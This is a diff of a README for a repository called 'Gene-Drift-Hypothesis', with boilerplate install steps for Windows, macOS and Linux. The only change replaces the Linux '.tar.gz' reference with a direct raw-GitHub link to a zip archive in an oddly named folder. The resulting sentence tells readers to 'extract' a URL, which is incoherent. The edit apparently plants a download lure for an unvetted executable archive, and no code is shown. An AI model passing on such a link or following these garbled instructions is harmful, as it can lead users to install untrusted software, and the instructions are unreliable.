Senmuxy/Gene-Drift-Hypothesis/README.md

    After downloading, locate the file in your Downloads folder or on your desktop.
    - **For Windows:** Double-click the `.exe` file and follow the installation instructions.
    - **For macOS:** Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file and follow the included README for installation instructions.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/Senmuxy/Gene-Drift-Hypothesis/main/Apollonistic/Gene-Drift-Hypothesis_2.6.zip` file and follow the included README for installation instructions.

 5. **Open the Application**
    After the installation, open the application by finding it in your Applications menu or desktop.